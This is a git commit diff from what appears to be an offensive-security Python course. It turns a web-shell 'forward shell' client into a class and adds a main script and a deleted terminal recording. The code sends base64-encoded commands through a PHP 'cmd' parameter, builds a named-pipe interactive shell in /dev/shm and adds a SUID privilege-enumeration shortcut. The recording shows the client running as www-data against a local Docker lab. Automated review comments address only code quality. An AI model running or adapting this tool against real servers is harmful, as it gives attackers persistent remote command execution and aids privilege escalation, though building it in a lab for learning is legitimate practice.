


Author SHA1 Message Date
d7252c6782 Update forwardshell script 2024-02-03 12:28:27 +01:00
d4c5d8a50f wip 2024-02-03 12:27:47 +01:00
3 changed files with 154 additions and 190 deletions


@ -11,24 +11,32 @@ mkfifo input; tail -f input | /bin/sh 2>&1 > output
""" """
import requests import requests
import signal import time
import sys
from termcolor import colored from termcolor import colored
from base64 import b64encode from base64 import b64encode
from random import randrange
def def_handler(sig, frame):
print(colored("\n[!] Exiting...", "blue"))
sys.exit(1)
signal.signal(signal.SIGINT, def_handler) class ForwardShell:
main_url = "http://localhost/index.php" def __init__(self):
session = randrange(100000, 999999)
def run_command(command): self.main_url = "http://localhost/index.php"
self.stdin = f"/dev/shm/{session}.input"
self.stdout = f"/dev/shm/{session}.output"
self.help_options = {
'enum suid': 'FileSystem SUID Privileges Enumeration',
'help': 'Show this help panel',
}
self.is_pseudo_terminal = False
def run_command(self, command):
command = b64encode(command.encode()).decode() command = b64encode(command.encode()).decode()
@ -36,16 +44,112 @@ def run_command(command):
'cmd': 'echo "%s" | base64 -d | /bin/sh' % command 'cmd': 'echo "%s" | base64 -d | /bin/sh' % command
} }
r = requests.get(main_url, params=data) try:
r = requests.get(self.main_url, params=data, timeout=5)
return r.text return r.text
except:
pass
if __name__ == '__main__': return None
def write_stdin(self, command):
command = b64encode(command.encode()).decode()
data = {
'cmd': 'echo "%s" | base64 -d > %s' % (command, self.stdin)
}
r = requests.get(self.main_url, params=data)
def read_stdout(self):
for _ in range(5):
read_stdout_command = f"/bin/cat {self.stdout}"
output_command = self.run_command(read_stdout_command)
time.sleep(0.2)
return output_command
def setup_shell(self):
command = f"mkfifo {self.stdin}; tail -f {self.stdin} | /bin/sh 2>&1 > {self.stdout}"
self.run_command(command)
def remove_data(self):
remove_data_command = f"/bin/rm {self.stdin} {self.stdout}"
self.run_command(remove_data_command)
def clear_stdout(self):
clear_stdout_command = f"echo '' > {self.stdout}"
self.run_command(clear_stdout_command)
def run(self) -> None:
self.setup_shell()
while True: while True:
command = input(colored("> ", "yellow")) command = input(colored("> ", "yellow"))
output_command = run_command(command)
if "script /dev/null -c bash" in command:
print(
colored("[+] Se ha iniciado una pseudo-terminal", "blue"))
self.is_pseudo_terminal = True
if command.strip() == "enum suid":
command = f"find / -perm -4000 2>/dev/null | xargs ls -l"
if command.strip() == "help":
print(colored(f"\n[+] Listando panel de ayuda:\n", "blue"))
for key, value in self.help_options.items():
print(f"\t{key} - {value}")
continue
self.write_stdin(command + "\n")
output_command = self.read_stdout()
if command.strip() == "exit":
self.is_pseudo_terminal = False
print(colored("[+] Se ha cerrado la pseudo-terminal", "blue"))
self.clear_stdout()
continue
if self.is_pseudo_terminal:
lines = output_command.split("\n")
if len(lines) == 1:
cleared_output = '\n'.join([lines[-1]] + lines[:1])
elif len(lines) > 1:
cleared_output = '\n'.join(
[lines[-1]] + lines[:1] + lines[2:-1])
else:
print(len(lines))
print(lines)
print(cleared_output + "\n")
else:
print(output_command) print(output_command)
self.clear_stdout()
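Review bot: The bare `except:` wrapped around the requests.get call in run_command catches BaseException, so a Ctrl-C during a pending request is swallowed and the method returns None; read_stdout then hands that None to run(), where `output_command.split("\n")` under is_pseudo_terminal raises AttributeError and the other branch prints the literal `None`. Narrow it to `except requests.RequestException:` / `return None` and have run() treat a None result as a failed request rather than as output (run_command's signature sits in the previous hunk). write_stdin still has the gap the commit closed in run_command: `r = requests.get(self.main_url, params=data)` carries no `timeout=` and the bound `r` is never used, so that request can block indefinitely. The `else:` branch in the is_pseudo_terminal block is unreachable (`str.split` never yields an empty list) and would leave `cleared_output` unbound if it were reached; the two debugging prints there are better replaced by a guard clause on `len(lines)` that `continue`s.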


@ -0,0 +1,29 @@
#!/usr/bin/env python3
"""
Fichero principal de la aplicación.
"""
import signal
import sys
from forwardshell import ForwardShell
from termcolor import colored
def def_handler(sig, frame) -> None:
print(colored("\n[!] Exiting...", "blue"))
my_forward_shell.remove_data()
sys.exit(1)
signal.signal(signal.SIGINT, def_handler)
if __name__ == '__main__':
my_forward_shell = ForwardShell()
my_forward_shell.run()
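Review bot: def_handler reads the module global my_forward_shell, which is only bound inside the `if __name__ == '__main__':` block, yet the handler is installed at import time by `signal.signal(signal.SIGINT, def_handler)`; a SIGINT arriving before `my_forward_shell = ForwardShell()` has completed, or when this file is imported rather than executed, raises NameError inside the handler instead of exiting cleanly. Moving the `signal.signal(...)` registration into the main block after the object is constructed closes that window. remove_data goes through run_command, so the cleanup request issued from inside the handler can block for up to that call's 5 s timeout before sys.exit runs, and a second Ctrl-C in that window may re-enter the handler; a one-line comment such as `# best-effort cleanup; may block until the request times out` would make that explicit. The module docstring is in Spanish while the identifiers and the imported module are in English; an English equivalent would help readers who do not speak Spanish.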


@ -1,169 +0,0 @@
Script started on 2024-02-02 18:20:04+01:00 [TERM="xterm-256color" TTY="/dev/pts/1" COLUMNS="106" LINES="53"]
 
7🐧 ~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs at ⚡ 18:20:04
 [?2004h[?25l8]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs]1;..hacking/12_fs]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs\%  
🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs on ☕ main ?1  🔒 ES at ⚡ 18:20:04
 [?1h=[?25h[?2004h[?25l 
🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:04
 🏠 192.168.1.115[?25h[?25l 
🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:04
 🏠 192.168.1.115 📡 192.145.39.55[?25hscriptscript/[?1l>[?25l[?2004l  script/[?25h
]2;script/]1;script/% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:09
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004h##!#!//uussrr//bbiinn//eennvv  ppyytthhoonn3[?1l>[?25l[?2004l  #!/usr/bin/env python3[?25h
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:30
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hccurl -s -X GET 'http://localhost/' -G --data-urlencode 'cmd=cat /etc/resolv.conf 2>&1'co🏠 192.168.1.115 📡 192.145.39.55de index.htmlcoddd           d e index.htmlcode f         irmaMail-Prefapp.htmlo                    rwat rdshell.py[?1l>[?25l[?2004l  code forwardshell.py[?25h
]2;code forwardshell.py]1;code% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:44
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hppyinstaller --noconsole --onefile backdoor.pypy                                           listener.pyf          irefox_decrypt.pyfo                orrwardshell.py  [?1l>[?25l[?2004l  py forwardshell.py[?25h
]2;python3 forwardshell.py]1;pywww-data
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:23:42
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l  py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> cat
/
^CTraceback (most recent call last):
File "/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/forwardshell.py", line 23, in <module>
output_command = run_command(command)
File "/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/forwardshell.py", line 14, in run_command
r = requests.get(main_url, params=data)
File "/home/v/.local/lib/python3.10/site-packages/requests/api.py", line 73, in get
return request("get", url, params=params, **kwargs)
File "/home/v/.local/lib/python3.10/site-packages/requests/api.py", line 59, in request
return session.request(method=method, url=url, **kwargs)
File "/home/v/.local/lib/python3.10/site-packages/requests/sessions.py", line 587, in request
resp = self.send(prep, **send_kwargs)
File "/home/v/.local/lib/python3.10/site-packages/requests/sessions.py", line 701, in send
r = adapter.send(request, **kwargs)
File "/home/v/.local/lib/python3.10/site-packages/requests/adapters.py", line 489, in send
resp = conn.urlopen(
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 700, in urlopen
httplib_response = self._make_request(
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 446, in _make_request
six.raise_from(e, None)
File "<string>", line 3, in raise_from
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 441, in _make_request
httplib_response = conn.getresponse()
File "/usr/lib/python3.10/http/client.py", line 1375, in getresponse
response.begin()
File "/usr/lib/python3.10/http/client.py", line 318, in begin
version, status, reason = self._read_status()
File "/usr/lib/python3.10/http/client.py", line 279, in _read_status
line = str(self.fp.readline(_MAXLINE + 1), "iso-8859-1")
File "/usr/lib/python3.10/socket.py", line 705, in readinto
return self._sock.recv_into(b)
KeyboardInterrupt
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/gi/p/curso-python/python-o/15/12/script on ☕ main ?1
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l  py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> whoami
www-data
> cat /etc/hosts
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.17.0.2 2f2f81768a05
> pwd
/var/www/html
> ^C
[!] Exiting...
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 7m 18s 🔒 ES vpn at ⚡ 18:34:09
 🏠 192.168.1.112 📡 192.145.39.55[?1h=[?2004h[?25l 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 7m 18s 🔒 ES vpn at ⚡ 18:34:09
 🏠 192.168.1.112 📡 192.145.39.54[?25hpy forwardshell.py[?1l>[?25l[?2004l  py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> exit
> exit
> ^C
[!] Exiting...
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 6s 🔒 ES vpn at ⚡ 18:35:25
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l  py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> exit
> exit
> ^C
[!] Exiting...
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 10s 🔒 ES vpn at ⚡ 18:36:02
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l  py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> exit
> ls
index.php
> e ^C
[!] Exiting...
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 10s 🔒 ES vpn at ⚡ 18:36:36
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hppy forwardshell.pyph                php --interactive[?1l>[?25l[?2004l  php --interactive[?25h
]2;php --interactive]1;phpzsh: command not found: php
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:36:56
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hdd exec -it 2f2 bashdo                 cker portdocckkedocker e   xec -it 0fc1 shxec -it 0fc1 sh[?1l>[?25l[?2004l  docker exec -it 0fc1 sh[?25h
]2;docker exec -it 0fc1 sh]1;dockerError response from daemon: No such container: 0fc1
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:37:09
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hddocker exec -it 0fc1 shd                      exec -it 2f2 bashexec -it 2f2 bash[?1l>[?25l[?2004l  d exec -it 2f2 bash[?25h
]2;docker exec -it 2f2 bash]1;droot@2f2f81768a05:/var/www/html# php --version
PHP 7.0.33 (cli) (built: Dec 29 2018 06:50:58) ( NTS )
Copyright (c) 1997-2017 The PHP Group
Zend Engine v3.0.0, Copyright (c) 1998-2017 Zend Technologies
root@2f2f81768a05:/var/www/html# php --interactive
Interactive shell
php > exit
root@2f2f81768a05:/var/www/html# e exit
exit
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 1m 55s 🔒 ES vpn at ⚡ 18:39:09
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hmmkdir scriptmkmkddimkdir c     atch-all/01_scripts_descifrador_wargame.pyi                                         bnc    atch-all/01_scripts_descifrador_wargame.pyo                                         mandos-peladon            cepto[?1l>[?25l[?2004l  mkdir concepto[?25h
]2;mkdir concepto]1;mkdir% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:39:33
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hllsls[?1l>[?25l[?2004l  ls[?25h
]2;ls --color=tty]1;lsconcepto forwardshell.py
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:39:33
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hccode forwardshell.pycocon                 catenadas="hola $kease"ncce                     epconcepto/o [?1l>[?25l[?2004l  concepto[?25h
]2;concepto]1;concepto% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto]1;..ript/concepto]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto\ 
🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto on ☕ main ?1  🔒 ES vpn at ⚡ 18:39:36
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hmmkdir conceptomkmkf           ifo --helpfiifmkfifo i     npyt;    ut;t  ttaaitail -f inop  put | //bbi/binn//bin/s/bin/sh 22>>&1 Z > ouputtput[?1l>[?25l[?2004l  mkfifo input; tail -f input | /bin/sh 2>&1 > output[?25h
]2;mkfifo input; tail -f input | /bin/sh 2>&1 > output]1;mkfifo^C
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto]1;..ript/concepto]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto\ 
🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto on ☕ main ?1 х INT took 7m 34s 🔒 ES vpn at ⚡ 18:48:03
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hcconceptoca      t ../09_keylogger/.env | pbcopycat o                            utput.pcap | wc -louutput              [?1l>[?25l[?2004l  cat output[?25h
]2;cat output]1;catv
/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto
/home/v
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto]1;..ript/concepto]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto\ 
🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto on ☕ main ?1  🔒 ES vpn at ⚡ 18:48:11
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hcat outputls       cat outputecho "whoami" > inputcat output         ls       cat outputecho "pwd" > inputcat output       ls       cat outputecho "whoami" > inputcat output         ls       cat outputls       cat output         mmkfifo input; tail -f input | /bin/sh 2>&1 > outputmkmkd                                                ir conceptomk            fifo input; tail -f input | /bin/sh 2>&1 > outputmkfmkfifo input; tail -f input | /bin/sh 2>&1 > output[?1l>[?25l[?2004l  mkfifo input; tail -f input | /bin/sh 2>&1 > output[?25h
]2;mkfifo input; tail -f input | /bin/sh 2>&1 > output]1;mkfifomkfifo: no sha pogut crear la cua FIFO 'input': El fitxer ja existeix
/bin/sh: 5: probando: not found
^C
Session terminated, killing shell...
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto]1;..ript/concepto]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto\ 
🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto on ☕ main ?1 х INT took 4m 51s 🔒 ES vpn at ⚡ 18:53:13
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004h ...killed.
[?25l  [?25h[?2004l
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto]1;..ript/concepto]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto\ 
🐧 ❌ ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto х INT 🔒 ES vpn at ⚡ 22:59:38
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004h 
🐧 ❌ ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto х INT 🔒 ES vpn at ⚡ 22:59:38
 🏠 192.168.1.112 📡 192.145.39.54eecho "whoami" > inputex                   itexiexit[?1l>[?25l[?2004l  exit[?25h
]2;exit]1;exit
Script done on 2024-02-02 23:00:00+01:00 [COMMAND_EXIT_CODE="130"]